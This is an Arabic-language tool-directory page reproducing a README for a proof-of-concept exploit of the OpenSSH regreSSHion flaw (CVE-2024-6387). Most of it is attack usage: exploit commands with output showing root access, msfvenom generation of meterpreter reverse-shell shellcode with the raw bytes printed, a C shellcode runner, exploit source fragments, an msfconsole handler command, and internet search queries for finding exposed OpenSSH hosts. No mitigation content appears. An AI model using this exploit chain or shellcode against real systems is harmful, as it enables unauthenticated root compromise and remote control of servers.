Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-6387 — CVE-2024-6387 POC (قيد التحرير حاليًا) | Kitploit
أدوات/GitHubGitHub/vuducmanhno100-cloud/cve-2024-6387
تحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubvuducmanhno100-cloud/cve-2024-6387

CVE-2024-6387

CVE-2024-6387 POC (قيد التحرير حاليًا)

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-6387

CVE-2024-6387 PoC (قيد التحرير حالياً)

openssh CVE-2024-6387 - PoC

📜 الوصف

ملاحظة: هذا السكريبت هو نموذج أولي سريع (PoC)، توقع حدوث بعض الأخطاء والعلل.
تم اختباره على: Kali Linux, ParrotSec, Ubuntu 22.04

ثغرة تنفيذ كود عن بُعد دون مصادقة في خادم OpenSSH

تم العثور على حالة سباق (race condition) في معالج الإشارة في خادم OpenSSH (sshd)، حيث إذا لم يقم العميل بالمصادقة خلال فترة LoginGraceTime (120 ثانية افتراضياً، 600 في الإصدارات القديمة من OpenSSH)، يتم استدعاء معالج SIGALRM بشكل غير متزامن. ومع ذلك، يقوم هذا المعالج باستدعاء دوال غير آمنة للإشارات غير المتزامنة، مثل syslog().

📁 جدول المحتويات

  • 📖 التفاصيل
  • ⚙️ الاستخدام
  • 🔍 اكتشاف المضيف
  • 🛠️ التخفيف
  • 💁 المراجع
  • 📌 المؤلف
  • 📢 إخلاء المسؤولية

✍🏻 التفاصيل

يمكنك العثور على التفاصيل الفنية هنا.

الخلل الذي اكتشفه باحثون في Qualys في May 2024، وتم تعيين المعرف CVE-2024-6387 له، ناتج عن حالة سباق في معالج الإشارة في sshd، مما يسمح للمهاجمين غير المصادقين عن بُعد بتنفيذ كود عشوائي بصلاحيات الجذر.

"إذا لم يقم العميل بالمصادقة خلال فترة LoginGraceTime (120 ثانية افتراضياً)، يتم استدعاء معالج SIGALRM الخاص بـ sshd بشكل غير متزامن، ويقوم باستدعاء دوال غير آمنة للإشارات غير المتزامنة."

"يمكن للمهاجم غير المصادق عن بُعد استغلال هذا الخلل لتنفيذ كود عشوائي بصلاحيات الجذر."

⚙️ الاستخدام

مسح خادم OpenSSH

المتطلب: python3 أحدث إصدار

root@kitploit:~
$ python3 CVE-2024-6387.py --exploit 192.168.56.101 --port 22

 ██████╗ ██████╗ ███████╗███╗   ██╗███████╗███████╗██╗  ██╗
██╔═══██╗██╔══██╗██╔════╝████╗  ██║██╔════╝██╔════╝██║  ██║
██║   ██║██████╔╝█████╗  ██╔██╗ ██║███████╗███████╗███████║
██║   ██║██╔═══╝ ██╔══╝  ██║╚██╗██║╚════██║╚════██║██╔══██║
╚██████╔╝██║     ███████╗██║ ╚████║███████║███████║██║  ██║
 ╚═════╝ ╚═╝     ╚══════╝╚═╝  ╚═══╝╚══════╝╚══════╝╚═╝  ╚═╝
   Author: l0n3m4n / Scanner: @xaitax / PoC: @7etsuo 
    
Exploiting vulnerabilities...
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
Received KEX_INIT (1024 bytes)
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
send_packet: Resource temporarily unavailable
.....
Exploitation successful..!

~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root) 

التصدير (csv,txt,json)

root@kitploit:~
$ python3 CVE-2024-6387.py -s 192.168.56.101 -p 22 -o json -f result.json

أهداف متعددة

root@kitploit:~
$ python3 CVE-2024-6387.py -s targets.txt -p 22 -o json -f result.json

إضافة مهلة زمنية

root@kitploit:~
$ python3 CVE-2024-6387.py -s 192.168.56.101 -p 22 -t 10 -o json -f result.json

نطاقات الشبكة

root@kitploit:~
$ python3 CVE-2024-6387.py -s 192.168.56.101/24 -p 22 -t 5 -o json -f result.json

منفذ مخصص

root@kitploit:~
$ python3 CVE-2024-6387.py -s 192.168.56.101 -p 2244 -t 5 -o json -f result.json

عملية التصعيد

الحصول على شل عكسي

root@kitploit:~
# توليد شيل كود 
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes

unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

حمولة مخصصة

root@kitploit:~
#include <stdio.h>

// مساحة مؤقتة لحمولتك المخصصة 
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

int main() {
    // تنفيذ الشيل كود
    printf("Executing shellcode...\n");
    void (*sc)() = (void(*)())shellcode;
    sc();

    return 0;
}

الحمولة الفعلية

root@kitploit:~
#include <stdio.h>
 

#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)

// Possible glibc base addresses (for ASLR bypass)
uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]);

// Shellcode placeholder (replace with actual shellcode)
unsigned char shellcode[] = "\x90\x90\x90\x90";

ترجمة وتشغيل الحمولة

root@kitploit:~
# ترجمة الحمولة
$ gcc -shared -o exploit.so -fPIC 7etsuo-regreSSHion.c 

تنفيذ الحمولة

root@kitploit:~
# بمجرد استلام رسالة نجاح الاستغلال، يقوم msfconsole تلقائياً ببدء جلسة Meterpreter.
$ python3 CVE-2024-6387.py --exploit 192.168.56.101 --p 22 

استلام الحمولة

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.56.100; set LPORT 9999; exploit -j"

🔍 اكتشاف المضيف

  • Hunter: /product.name="OpenSSH"
  • FOFA: app="OpenSSH"
  • SHODAN: product:"OpenSSH"
  • CENSYS: (openssh) and labels=remote-access
تنزيل الأداة